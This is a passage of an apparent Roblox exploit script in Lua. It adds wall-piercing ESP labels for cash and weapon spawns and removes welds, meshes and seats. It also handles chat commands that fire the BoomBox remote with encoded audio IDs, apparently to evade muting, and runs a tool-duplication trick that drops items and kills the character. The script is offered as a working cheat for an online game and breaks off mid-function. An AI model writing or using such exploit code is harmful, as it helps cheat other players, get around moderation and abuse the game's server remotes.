  778. return playableid
  779. end
  780.  
  781.  
  782. function fullyconvert(id)
  783. local convert = toversionid(id)
  784. local encoded = percentencode(convert)
  785. local playable = toplayable(encoded)
  786. return playable
  787. end
  788.  
  789.  
  790. local function removeothershotty(instance)
  791. for i,v in pairs(instance:GetChildren()) do
  792. if v.Name == "ESP" and v:FindFirstChild("SHOTTY") then
  793. v:Destroy()
  794. end
  795. removeothershotty(v)
  796. end
  797. end
  798.  
  799. local function removeotheruzi(instance)
  800. for i,v in pairs(instance:GetChildren()) do
  801. if v.Name == "ESP" and v:FindFirstChild("UZi") then
  802. v:Destroy()
  803. end
  804. removeotheruzi(v)
  805. end
  806. end
  807.  
  808. function showcash(v)
  809. local epic = Instance.new("Part")
  810. epic.Parent = v
  811. epic.Name = "parttrace"
  812. epic.CFrame = v.CFrame
  813. epic.Size = Vector3.new(0.2,0.2,0.2)
  814. epic.Anchored = true
  815. epic.Transparency = 1
  816.  
  817. local billgui = Instance.new('BillboardGui', epic)
  818. local textlab = Instance.new('TextLabel', billgui)
  819.  
  820. billgui.Name = "ESP"
  821. billgui.Adornee = epic
  822. billgui.AlwaysOnTop = true
  823. billgui.ExtentsOffset = Vector3.new(0, 1, 0)
  824. billgui.Size = UDim2.new(0, 5, 0, 5)
  825.  
  826. textlab.Name = 'CASH'
  827. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  828. textlab.BackgroundTransparency = 1
  829. textlab.BorderSizePixel = 0
  830. textlab.Position = UDim2.new(0, 0, 0, -40)
  831. textlab.Size = UDim2.new(1, 0, 10, 0)
  832. textlab.Visible = true
  833. textlab.ZIndex = 10
  834. textlab.Font = 'ArialBold'
  835. textlab.FontSize = 'Size14'
  836. textlab.Text = "CASH"
  837. textlab.TextColor = BrickColor.new('Bright red')
  838. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  839. textlab.TextStrokeTransparency = 0.6
  840. end
  841.  
  842. function showcsign(v)
  843. local epic = Instance.new("Part")
  844. epic.Parent = v
  845. epic.Name = "parttrace"
  846. epic.CFrame = v.CFrame
  847. epic.Size = Vector3.new(0.2,0.2,0.2)
  848. epic.Anchored = true
  849. epic.Transparency = 1
  850.  
  851. local billgui = Instance.new('BillboardGui', epic)
  852. local textlab = Instance.new('TextLabel', billgui)
  853.  
  854. billgui.Name = "ESP"
  855. billgui.Adornee = epic
  856. billgui.AlwaysOnTop = true
  857. billgui.ExtentsOffset = Vector3.new(0, 1, 0)
  858. billgui.Size = UDim2.new(0, 5, 0, 5)
  859.  
  860. textlab.Name = 'SIGN'
  861. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  862. textlab.BackgroundTransparency = 1
  863. textlab.BorderSizePixel = 0
  864. textlab.Position = UDim2.new(0, 0, 0, -40)
  865. textlab.Size = UDim2.new(1, 0, 10, 0)
  866. textlab.Visible = true
  867. textlab.ZIndex = 10
  868. textlab.Font = 'ArialBold'
  869. textlab.FontSize = 'Size14'
  870. textlab.Text = "STOP SIGN"
  871. textlab.TextColor = BrickColor.new('Royal purple')
  872. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  873. textlab.TextStrokeTransparency = 0.6
  874. end
  875.  
  876.  
  877. function showuzi(v)
  878. local epic = Instance.new("Part")
  879. epic.Parent = v
  880. epic.Name = "parttrace"
  881. epic.CFrame = v.CFrame
  882. epic.Size = Vector3.new(0.2,0.2,0.2)
  883. epic.Anchored = true
  884. epic.Transparency = 1
  885.  
  886. local billgui = Instance.new('BillboardGui', epic)
  887. local textlab = Instance.new('TextLabel', billgui)
  888.  
  889. billgui.Name = "ESP"
  890. billgui.Adornee = epic
  891. billgui.AlwaysOnTop = true
  892. billgui.ExtentsOffset = Vector3.new(0, 1, 0)
  893. billgui.Size = UDim2.new(0, 5, 0, 5)
  894.  
  895. textlab.Name = 'UZI'
  896. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  897. textlab.BackgroundTransparency = 1
  898. textlab.BorderSizePixel = 0
  899. textlab.Position = UDim2.new(0, 0, 0, -40)
  900. textlab.Size = UDim2.new(1, 0, 10, 0)
  901. textlab.Visible = true
  902. textlab.ZIndex = 10
  903. textlab.Font = 'ArialBold'
  904. textlab.FontSize = 'Size18'
  905. textlab.Text = "UZI"
  906. textlab.TextColor = BrickColor.new('Bright blue')
  907. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  908. textlab.TextStrokeTransparency = 0.6
  909. end
  910.  
  911.  
  912. function showshotty(v)
  913. local epic = Instance.new("Part")
  914. epic.Parent = v
  915. epic.Name = "parttrace"
  916. epic.CFrame = v.CFrame
  917. epic.Size = Vector3.new(0.2,0.2,0.2)
  918. epic.Anchored = true
  919. epic.Transparency = 1
  920.  
  921. local billgui = Instance.new('BillboardGui', epic)
  922. local textlab = Instance.new('TextLabel', billgui)
  923.  
  924. billgui.Name = "ESP"
  925. billgui.Adornee = epic
  926. billgui.AlwaysOnTop = true
  927. billgui.ExtentsOffset = Vector3.new(0, 1, 0)
  928. billgui.Size = UDim2.new(0, 5, 0, 5)
  929.  
  930. textlab.Name = 'SHOTTY'
  931. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  932. textlab.BackgroundTransparency = 1
  933. textlab.BorderSizePixel = 0
  934. textlab.Position = UDim2.new(0, 0, 0, -40)
  935. textlab.Size = UDim2.new(1, 0, 10, 0)
  936. textlab.Visible = true
  937. textlab.ZIndex = 10
  938. textlab.Font = 'ArialBold'
  939. textlab.FontSize = 'Size14'
  940. textlab.Text = "SHOTTY"
  941. textlab.TextColor = BrickColor.new('Bright yellow')
  942. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  943. textlab.TextStrokeTransparency = 0.6
  944. end
  945.  
  946.  
  947. local function tracecash(instance)
  948. for i,v in pairs(instance:GetChildren()) do
  949. if v:IsA("MeshPart") and v.MeshId == "rbxassetid://511726060" then
  950. removeothercash(v.Parent)
  951. showcash(v)
  952. end
  953. tracecash(v)
  954. end
  955. end
  956.  
  957.  
  958. local function traceshotty(instance)
  959. for i,v in pairs(instance:GetChildren()) do
  960. if v:IsA("Sound") and v.Name == "Fire" and v.Parent.Parent.Parent.Name == "RandomSpawner" and string.find(tostring(v.SoundId), tostring(142383762)) then
  961. removeothershotty(v.Parent)
  962. showshotty(v.Parent)
  963. end
  964. traceshotty(v)
  965. end
  966. end
  967.  
  968.  
  969. local function traceuzi(instance)
  970. for i,v in pairs(instance:GetChildren()) do
  971. if v:IsA("Sound") and v.Name == "Fire" and v.Parent.Parent.Parent.Name == "RandomSpawner" and string.find(tostring(v.SoundId), tostring(328964620)) then
  972. removeotheruzi(v.Parent)
  973. showuzi(v.Parent)
  974. end
  975. traceuzi(v)
  976. end
  977. end
  978.  
  979.  
  980.  
  981. for i,v in pairs(game.Workspace:GetChildren()) do
  982. if v.Name == "RandomSpawner" then
  983. if v:FindFirstChild("Model") then
  984. v.Model.ChildAdded:Connect(function(child)
  985. tracecash(child)
  986. traceshotty(child)
  987. traceuzi(child)
  988. end)
  989. end
  990. v.ChildAdded:Connect(function(child)
  991. tracecash(child)
  992. traceshotty(child)
  993. traceuzi(child)
  994. end)
  995. end
  996. end
  997.  
  998. game.Workspace.ChildAdded:Connect(function(child)
  999. if child.Name == "RandomSpawner" then
  1000. repeat wait() until child.Model
  1001. tracecash(child)
  1002. traceshotty(child)
  1003. traceuzi(child)
  1004. end
  1005. end)
  1006.  
  1007. tracecash(game.Workspace)
  1008. traceshotty(game.Workspace)
  1009. traceuzi(game.Workspace)
  1010.  
  1011. local function uncancollide(instance)
  1012. for i,v in pairs(instance:GetChildren()) do
  1013. if v:IsA("BasePart") then
  1014. v.CanCollide = false
  1015. v.Massless = true
  1016. end
  1017. uncancollide(v)
  1018. end
  1019. end
  1020.  
  1021.  
  1022. local function radioglitchy(instance)
  1023. for i,v in pairs(instance:GetChildren()) do
  1024. if v:IsA("Script") then
  1025. v:Destroy()
  1026. end
  1027. radioglitchy(v)
  1028. end
  1029. end
  1030.  
  1031. local function invis(instance)
  1032. for i,v in pairs(instance:GetChildren()) do
  1033. if v.Name == "Weld" and v.Parent.Name ~= "Heh" and v.Parent.Name ~= "Barrel" then
  1034. v:Destroy()
  1035. end
  1036. invis(v)
  1037. end
  1038. end
  1039.  
  1040.  
  1041. local function demesh(instance)
  1042. for i,v in pairs(instance:GetChildren()) do
  1043. if v:IsA("SpecialMesh") then
  1044. v:remove()
  1045. end
  1046. demesh(v)
  1047. end
  1048. end
  1049.  
  1050. local function wirerun(instance)
  1051. for i,v in pairs(instance:GetChildren()) do
  1052. if v:IsA("BasePart") and v.Name == "Wires" then
  1053. v.CanCollide = true
  1054. v.Size = v.Size + Vector3.new(2, 0, 0)
  1055. end
  1056. wirerun(v)
  1057. end
  1058. end
  1059. wirerun(game.Workspace)
  1060.  
  1061. local function unwirerun(instance)
  1062. for i,v in pairs(instance:GetChildren()) do
  1063. if v:IsA("BasePart") and v.Name == "Wires" then
  1064. v.CanCollide = false
  1065. v.Size = v.Size - Vector3.new(2, 0, 0)
  1066. end
  1067. unwirerun(v)
  1068. end
  1069. end
  1070.  
  1071. local function deseat(instance)
  1072. for i,v in pairs(instance:GetChildren()) do
  1073. if v:IsA("Seat") then
  1074. v.Parent = game.Lighting
  1075. end
  1076. deseat(v)
  1077. end
  1078. end
  1079.  
  1080. local function reseat(instance)
  1081. for i,v in pairs(instance:GetChildren()) do
  1082. if v:IsA("Seat") then
  1083. v.Parent = game.Workspace
  1084. end
  1085. reseat(v)
  1086. end
  1087. end
  1088.  
  1089.  
  1090. function defence(instance)
  1091. for i,v in pairs(instance:GetChildren()) do
  1092. if v:IsA("Texture") then
  1093. if v.Parent then
  1094. if v.Parent.Transparency == 1 then
  1095. v.Parent.Parent = game.Lighting
  1096. end
  1097. end
  1098. end
  1099. defence(v)
  1100. end
  1101. end
  1102.  
  1103.  
  1104. function refence(instance)
  1105. for i,v in pairs(instance:GetChildren()) do
  1106. if v:IsA("Texture") then
  1107. if v.Parent then
  1108. if v.Parent.Transparency == 1 then
  1109. v.Parent.Parent = game.Workspace
  1110. end
  1111. end
  1112. end
  1113. refence(v)
  1114. end
  1115. end
  1116.  
  1117.  
  1118.  
  1119. for i,v in pairs(game.Workspace:GetChildren()) do
  1120. if v.Name == "Boards" then
  1121. for i,x in pairs(v:GetChildren()) do
  1122. table.insert(planks,(#planks+1),x)
  1123. end
  1124. end
  1125. end
  1126.  
  1127.  
  1128.  
  1129. function messagecommandshandle(plr,msg)
  1130.  
  1131. local lower = string.lower(msg)
  1132. local len = string.len(lower)
  1133.  
  1134.  
  1135. if string.find(lower,":play ") then
  1136. idtoplay = string.gsub(lower,":play ","")
  1137. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1138. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1139. v.Parent = game.Players.LocalPlayer.Character
  1140. end
  1141. end
  1142. wait(0.1)
  1143. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", idtoplay)
  1144. wait(0.1)
  1145. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1146. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1147. end
  1148.  
  1149. if string.find(lower,"/e play ") then
  1150. idtoplay = string.gsub(lower,"/e play ","")
  1151. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1152. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1153. v.Parent = game.Players.LocalPlayer.Character
  1154. end
  1155. end
  1156. wait(0.1)
  1157. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", idtoplay)
  1158. wait(0.1)
  1159. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1160. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1161. end
  1162.  
  1163. if string.find(lower,"/e :play ") then
  1164. idtoplay = string.gsub(lower,"/e :play ","")
  1165. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1166. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1167. v.Parent = game.Players.LocalPlayer.Character
  1168. end
  1169. end
  1170. wait(0.1)
  1171. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", idtoplay)
  1172. wait(0.1)
  1173. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1174. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1175. end
  1176.  
  1177.  
  1178.  
  1179. if string.find(lower,":eplay ") then
  1180. idtoplay = string.gsub(lower,":eplay ","")
  1181. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1182. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1183. v.Parent = game.Players.LocalPlayer.Character
  1184. end
  1185. end
  1186. wait(0.1)
  1187. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1188. wait(0.1)
  1189. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1190. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1191. end
  1192.  
  1193. if string.find(lower,"/e eplay ") then
  1194. idtoplay = string.gsub(lower,"/e eplay ","")
  1195. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1196. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1197. v.Parent = game.Players.LocalPlayer.Character
  1198. end
  1199. end
  1200. wait(0.1)
  1201. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1202. wait(0.1)
  1203. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1204. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1205. end
  1206. if string.find(lower,"/e :eplay ") then
  1207. idtoplay = string.gsub(lower,"/e :eplay ","")
  1208. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1209. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1210. v.Parent = game.Players.LocalPlayer.Character
  1211. end
  1212. end
  1213. wait(0.1)
  1214. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1215. wait(0.1)
  1216. radioglitchy(game.Players.LocalPlayer.Character.BoomBox)
  1217. game.Players.LocalPlayer.Character:FindFirstChild("BoomBox").Parent = game.Players.LocalPlayer.Backpack
  1218. end
  1219.  
  1220.  
  1221. if string.find(lower,":erplay ") then
  1222. idtoplay = string.gsub(lower,":erplay ","")
  1223. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1224. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1225. v.Parent = game.Players.LocalPlayer.Character
  1226. end
  1227. end
  1228. wait(0.1)
  1229. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1230. end
  1231. if string.find(lower,"/e erplay ") then
  1232. idtoplay = string.gsub(lower,"/e erplay ","")
  1233. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1234. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1235. v.Parent = game.Players.LocalPlayer.Character
  1236. end
  1237. end
  1238. wait(0.1)
  1239. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1240. end
  1241. if string.find(lower,"/e :erplay ") then
  1242. idtoplay = string.gsub(lower,"/e :erplay ","")
  1243. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1244. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1245. v.Parent = game.Players.LocalPlayer.Character
  1246. end
  1247. end
  1248. wait(0.1)
  1249. game.Players.LocalPlayer.Character.BoomBox.Remote:FireServer("PlaySong", fullyconvert(idtoplay))
  1250. end
  1251.  
  1252.  
  1253. if string.find(lower,":mplay ") then
  1254. if godmode == true then
  1255. idtoplay = string.gsub(lower,":mplay ","")
  1256. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1257. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1258. v.Parent = game.Players.LocalPlayer.Character
  1259. end
  1260. end
  1261. wait(0.1)
  1262. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1263. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1264. v.Remote:FireServer("PlaySong", idtoplay)
  1265. end
  1266. end
  1267. else
  1268. promptgod()
  1269. end
  1270. end
  1271.  
  1272. if string.find(lower,"/e mplay ") then
  1273. if godmode == true then
  1274. idtoplay = string.gsub(lower,"/e mplay ","")
  1275. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1276. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1277. v.Parent = game.Players.LocalPlayer.Character
  1278. end
  1279. end
  1280. wait(0.1)
  1281. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1282. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1283. v.Remote:FireServer("PlaySong", idtoplay)
  1284. end
  1285. end
  1286. else
  1287. promptgod()
  1288. end
  1289. end
  1290.  
  1291.  
  1292. if string.find(lower,"/e :mplay ") then
  1293. if godmode == true then
  1294. idtoplay = string.gsub(lower,"/e :mplay ","")
  1295. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1296. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1297. v.Parent = game.Players.LocalPlayer.Character
  1298. end
  1299. end
  1300. wait(0.1)
  1301. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1302. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1303. v.Remote:FireServer("PlaySong", idtoplay)
  1304. end
  1305. end
  1306. else
  1307. promptgod()
  1308. end
  1309. end
  1310.  
  1311.  
  1312. if string.find(lower,":emplay ") then
  1313. if godmode == true then
  1314. idtoplay = fullyconvert(string.gsub(lower,":emplay ",""))
  1315. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1316. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1317. v.Parent = game.Players.LocalPlayer.Character
  1318. end
  1319. end
  1320. wait(0.1)
  1321. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1322. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1323. v.Remote:FireServer("PlaySong", idtoplay)
  1324. end
  1325. end
  1326. else
  1327. promptgod()
  1328. end
  1329. end
  1330.  
  1331. if string.find(lower,"/e emplay ") then
  1332. if godmode == true then
  1333. idtoplay = fullyconvert(string.gsub(lower,"/e emplay ",""))
  1334. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1335. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1336. v.Parent = game.Players.LocalPlayer.Character
  1337. end
  1338. end
  1339. wait(0.1)
  1340. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1341. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1342. v.Remote:FireServer("PlaySong", idtoplay)
  1343. end
  1344. end
  1345. else
  1346. promptgod()
  1347. end
  1348. end
  1349.  
  1350.  
  1351. if string.find(lower,"/e :emplay ") then
  1352. if godmode == true then
  1353. idtoplay = fullyconvert(string.gsub(lower,"/e :emplay ",""))
  1354. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1355. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1356. v.Parent = game.Players.LocalPlayer.Character
  1357. end
  1358. end
  1359. wait(0.1)
  1360. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1361. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1362. v.Remote:FireServer("PlaySong", idtoplay)
  1363. end
  1364. end
  1365. else
  1366. promptgod()
  1367. end
  1368. end
  1369.  
  1370. if string.find(lower,":miplay ") then
  1371. if godmode == true then
  1372. idtoplay = string.gsub(lower,":miplay ","")
  1373. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1374. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1375. v.Parent = game.Players.LocalPlayer.Character
  1376. end
  1377. end
  1378. wait(0.1)
  1379. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1380. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1381. v.Remote:FireServer("PlaySong", idtoplay)
  1382. radioglitchy(v)
  1383. end
  1384. end
  1385. wait(0.1)
  1386. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1387. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1388. radioglitchy(v)
  1389. end
  1390. end
  1391. else
  1392. promptgod()
  1393. end
  1394. end
  1395.  
  1396. if string.find(lower,"/e miplay ") then
  1397. if godmode == true then
  1398. idtoplay = string.gsub(lower,"/e miplay ","")
  1399. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1400. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1401. v.Parent = game.Players.LocalPlayer.Character
  1402. end
  1403. end
  1404. wait(0.1)
  1405. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1406. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1407. v.Remote:FireServer("PlaySong", idtoplay)
  1408. end
  1409. end
  1410. wait(0.1)
  1411. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1412. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1413. radioglitchy(v)
  1414. end
  1415. end
  1416. else
  1417. promptgod()
  1418. end
  1419. end
  1420.  
  1421. if string.find(lower,"/e :miplay ") then
  1422. if godmode == true then
  1423. idtoplay = string.gsub(lower,"/e :miplay ","")
  1424. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1425. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1426. v.Parent = game.Players.LocalPlayer.Character
  1427. end
  1428. end
  1429. wait(0.1)
  1430. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1431. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1432. v.Remote:FireServer("PlaySong", idtoplay)
  1433. end
  1434. end
  1435. wait(0.1)
  1436. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1437. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1438. radioglitchy(v)
  1439. end
  1440. end
  1441. else
  1442. promptgod()
  1443. end
  1444. end
  1445.  
  1446. if lower == ":bringboom" then
  1447. if godmode == true then
  1448. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1449. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1450. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1451. end
  1452. end
  1453. else
  1454. promptgod()
  1455. end
  1456. end
  1457.  
  1458. if lower == "/e bringboom" then
  1459. if godmode == true then
  1460. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1461. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1462. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1463. end
  1464. end
  1465. else
  1466. promptgod()
  1467. end
  1468. end
  1469.  
  1470. if lower == "/e :bringboom" then
  1471. if godmode == true then
  1472. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1473. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1474. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1475. end
  1476. end
  1477. else
  1478. promptgod()
  1479. end
  1480. end
  1481.  
  1482.  
  1483. if lower == ":boombring" then
  1484. if godmode == true then
  1485. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1486. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1487. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1488. end
  1489. end
  1490. else
  1491. promptgod()
  1492. end
  1493. end
  1494.  
  1495.  
  1496. if lower == "/e boombring" then
  1497. if godmode == true then
  1498. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1499. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1500. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1501. end
  1502. end
  1503. else
  1504. promptgod()
  1505. end
  1506. end
  1507.  
  1508.  
  1509. if lower == "/e :boombring" then
  1510. if godmode == true then
  1511. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  1512. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1513. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  1514. end
  1515. end
  1516. else
  1517. promptgod()
  1518. end
  1519. end
  1520.  
  1521. if lower == ":dupeboom" then
  1522. if godmode == true then
  1523. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1524. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1525. v.Parent = game.Players.LocalPlayer.Character
  1526. end
  1527. end
  1528. wait()
  1529. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1530. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1531. v.Parent = game.Workspace.Terrain
  1532. end
  1533. end
  1534. wait()
  1535. for i = 1,3 do
  1536. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1537. wait(0.1)
  1538. end
  1539. bringboomsback = true
  1540. if game.Players.LocalPlayer.Character ~= nil then
  1541. game.Players.LocalPlayer.Character:BreakJoints()
  1542. end
  1543. else
  1544. promptgod()
  1545. end
  1546. end
  1547.  
  1548. if lower == "/e dupeboom" then
  1549. if godmode == true then
  1550. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1551. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1552. v.Parent = game.Players.LocalPlayer.Character
  1553. end
  1554. end
  1555. wait()
  1556. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1557. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1558. v.Parent = game.Workspace.Terrain
  1559. end
  1560. end
  1561. wait()
  1562. for i = 1,3 do
  1563. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1564. wait(0.1)
  1565. end
  1566. bringboomsback = true
  1567. if game.Players.LocalPlayer.Character ~= nil then
  1568. game.Players.LocalPlayer.Character:BreakJoints()
  1569. end
  1570. else
  1571. promptgod()
  1572. end
  1573. end
  1574.  
  1575. if lower == "/e :dupeboom" then
  1576. if godmode == true then
  1577. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1578. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1579. v.Parent = game.Players.LocalPlayer.Character
  1580. end
  1581. end
  1582. wait()
  1583. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1584. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1585. v.Parent = game.Workspace.Terrain
  1586. end
  1587. end
  1588. wait()
  1589. for i = 1,3 do
  1590. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1591. wait(0.1)
  1592. end
  1593. bringboomsback = true
  1594. if game.Players.LocalPlayer.Character ~= nil then
  1595. game.Players.LocalPlayer.Character:BreakJoints()
  1596. end
  1597. else
  1598. promptgod()
  1599. end
  1600. end
  1601.  
  1602. if lower == ":unmutable" then
  1603. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1604. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1605. v.Parent = game.Players.LocalPlayer.Character
  1606. end
  1607. end
  1608. wait()
  1609. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1610. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1611. v.Parent = game.Workspace.Terrain
  1612. end
  1613. end
  1614. wait()
  1615. for i = 1,3 do
  1616. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1617. wait(0.1)
  1618. end
  1619. bringboomsback = true
  1620. if game.Players.LocalPlayer.Character ~= nil then
  1621. game.Players.LocalPlayer.Character:BreakJoints()
  1622. end
  1623. repeat wait() until continueunmutable == true
  1624. continueunmutable = false
  1625. wait()
  1626. for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1627. if v:IsA("Tool") and v.Name == "BoomBox" and i == 2 then
  1628. v.Parent = game.Players.LocalPlayer.Character
  1629. repeat wait() until game.Players.LocalPlayer.Backpack:FindFirstChild("BoomBox")
  1630. end
  1631. end
  1632. wait(0.4)
  1633. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1634. if v:IsA("Tool") and v.Name == "BoomBox" and v:FindFirstChild("Remote") then
  1635. v.Remote:FireServer("PlaySong", "3456969984")
  1636. wait(1.411)
  1637. v.Parent = game.Players.LocalPlayer.Backpack
  1638. end
  1639. end
  1640. game.StarterGui:SetCore("SendNotification", {
  1641. Title = "Done!";
  1642. Text = "Your boombox is unmutable now";
  1643. Icon = "rbxassetid://847562022";
  1644. Duration = 5;
  1645. })
  1646. end
  1647.  
  1648. if lower == "/e unmutable" then
  1649. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1650. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1651. v.Parent = game.Players.LocalPlayer.Character
  1652. end
  1653. end
  1654. wait()
